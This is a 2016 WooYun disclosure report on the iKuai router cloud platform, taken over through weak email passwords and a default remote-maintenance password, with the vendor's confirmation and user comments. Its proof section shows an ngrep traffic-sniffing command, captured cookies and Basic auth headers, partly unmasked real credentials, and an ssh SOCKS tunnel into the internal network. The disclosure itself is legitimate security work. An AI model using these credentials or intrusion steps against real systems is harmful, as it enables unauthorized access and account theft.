WIFI安全之爱快路由云平台任意用户登陆及通过wifi漫游爱快内网（官方演示）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0207907

漏洞标题：WIFI安全之爱快路由云平台任意用户登陆及通过wifi漫游爱快内网（官方演示）

漏洞作者：北京方便面

提交时间：2016-05-12 17:20

修复时间：2016-06-27 10:20

公开时间：2016-06-27 10:20

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-05-12：细节已通知厂商并且等待厂商处理中
2016-05-13：厂商已经确认，细节仅向厂商公开
2016-05-23：细节向核心白帽子及相关领域专家公开
2016-06-02：细节向普通白帽子公开
2016-06-12：细节向实习白帽子公开
2016-06-27：细节向公众公开

简要描述：

WIFI安全之爱快路由云平台任意用户登陆及通过wifi漫游爱快内网（官方演示）

详细说明：

mask 区域

*****om  ik*****

源于一个邮箱弱口令
其他弱口令：

mask 区域

*****.com ik*****

mask 区域

*****云平^*****
*****kuai8*****
*****45*****

mask 区域

*****^躺^*****
*****20.132*****
*****^ro*****
*****ai201*****

漏洞证明：

控制了云端能做哪些呢？
插js看一下效果

测试过程中又发现一个问题
路由器中有一个远程维护功能，只要开启，默认密码就是www.ikuai8.com
但账号未知
后通过邮件分析发现账号应该是sshd(通用问题)

root权限控制官方路由，可以使用ngrep进行抓包
所有http请求一览无余，不止有cookie

ngrep -q -W byline -d lan1 "^(GET|POST|HTTP) .*"

T 192.168.1.188:54272 -> 115.29.185.206:80 [AP]
GET /public?action=system.getSysTime&data={} HTTP/1.1.
Host: cc.7moor.com.
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0.
Accept: */*.
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3.
Accept-Encoding: gzip, deflate.
DNT: 1.
X-Requested-With: XMLHttpRequest.
Referer: http://cc.7moor.com/.
Cookie: loginName=8**0*******; extenType=gateway; rememberBusyType=true; password=xw*******04; remember=true; logoutCheck=true; Hm_lvt_b88c6366e7fa016f4ada0c3bc6c694d2=1458625721,1459391683,1459501612; BDTUJIAID=c1449a486b9ea8407f476361853d9e75; session=2a7de870-8c13-11e5-a964-4541194ad61a.
Connection: keep-alive.

mask 区域

1.http://**.**.**/  账号：8000@Ikuai 密码：xwq19910304

T 192.168.1.252:52225 -> 220.249.243.199:80 [AP]
POST /Microsoft-Server-ActiveSync?User=lxliu&DeviceId=6DDC1702BF011AC165EF7C9EC0AD1D82&DeviceType=Foxmail&Cmd=Sync HTTP/1.0.
Accept: text/html, */*.
User-Agent: MSFT-PPC/5.2.1400.
Content-Length: 77.
Host: ex.qq.com.
Connection: keep-alive.
Content-Type: application/vnd.ms-sync.wbxml.
MS-ASProtocolVersion: 12.0.
Authorization: Basic bHhsaXVAaWt1YWk4LmNvbTppS3VhaTg=.

邮箱账号密码

mask 区域

*****8.com:*****

邮箱内发现官方路由密码：

mask 区域

*****ZiBi*****

T 192.168.0.240:26452 -> 118.184.176.13:80 [AP]
GET /dyndns/update?system=dyndns&hostname=hlcui.in.3322.org&myip=66.0.0.249 HTTP/1.1.
User-Agent: Wget/1.13.4 (linux-gnu).
Accept: */*.
Authorization: Basic 

mask 区域

*****3LmlrdWF*****




.
Host: members.3322.org.
Connection: Keep-Alive.

http://www.pubyun.com/user/
hlcui123:www.ikuai8.com
另外发现了内网禅道系统
http://192.168.1.88/
可以通过ssh代理的方式访问
ssh -qTfnN -D 7878

mask 区域

*****253.1*****

内网的多个路由沦陷

修复方案：

版权声明：转载请注明来源北京方便面@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2016-05-13 10:18

厂商回复：

一个简单的问题，或者说是疏忽的问题，会波及很大的漏洞，这个之前真是没有想到，创业三年来乌云和白帽子对我们帮助实在是太大了，不但帮从专业角度帮助我们发现了很多漏洞和隐患，也从事实的角度教育了我们的同事们提升安全意识，我们团队对乌云和白帽子深深的鞠躬，表示我们由衷的感谢，本次的漏洞的发现让我们对一些平时看起来不显眼的地方更加关注，感谢乌云，感谢白帽子

漏洞评价：

评价

2016-05-12 17:33 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

云路由和固件说啥也不用了
2016-05-12 17:50 | HackBraid ( 核心白帽子 | Rank:1914 漏洞数:304 | 最近有人冒充该账号行骗，任何自称HackBrai...)

@疯狗只用＊炸天的WooYun WIFI
2016-05-12 17:51 | 坏男孩-A_A ( 实习白帽子 | Rank:81 漏洞数:23 | 膜拜学习中)

关注- -
2016-05-12 17:59 | 黑色键盘丶 ( 普通白帽子 | Rank:2413 漏洞数:512 | 哥,是孤独风中的一匹狼)

wifi太狠了防不住
2016-05-12 18:09 | 狗胜 ( 路人 | Rank:11 漏洞数:1 | ../../../../../../../../../../../../../....)

爱快这名字咋想的，求科普。。
2016-05-12 18:21 | Fire ant ( 普通白帽子 | Rank:108 漏洞数:35 | 他们回来了................)

66666666666
2016-05-12 18:50 | 爱快免费流控路由(乌云厂商)

感谢白帽子兄弟，一个邮箱密码就导致这么多问题，真的给我们上了一课，所有涉及到的地方我们正在努力修补中，感谢您
2016-05-12 21:04 | Alert ( 路人 | Rank:4 漏洞数:2 | X-Alert)

666666
2016-05-12 21:57 | 黑暗游侠 ( 普通白帽子 | Rank:1800 漏洞数:274 | 123)

看来是官方的找回密码邮件泄露了
2016-05-13 10:29 | 重瞳 ( 路人 | Rank:11 漏洞数:2 | 我是重瞳)

@狗胜 ....
2016-05-13 11:01 | 佳佳佳佳佳 ( 实习白帽子 | Rank:45 漏洞数:7 | I want to be ur sunshine.)

为厂商的态度点个赞～

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0207907

漏洞标题：WIFI安全之爱快路由云平台任意用户登陆及通过wifi漫游爱快内网（官方演示）

相关厂商：爱快免费流控路由

漏洞作者：北京方便面

提交时间：2016-05-12 17:20

修复时间：2016-06-27 10:20

公开时间：2016-06-27 10:20

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源北京方便面@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0207907

漏洞标题：WIFI安全之爱快路由云平台任意用户登陆及通过wifi漫游爱快内网（官方演示）

相关厂商：爱快免费流控路由

漏洞作者： 北京方便面

提交时间：2016-05-12 17:20

修复时间：2016-06-27 10:20

公开时间：2016-06-27 10:20

漏洞类型：设计缺陷/逻辑错误

危害等级：高

自评Rank：20

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0207907"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 北京方便面@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：北京方便面

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源北京方便面@乌云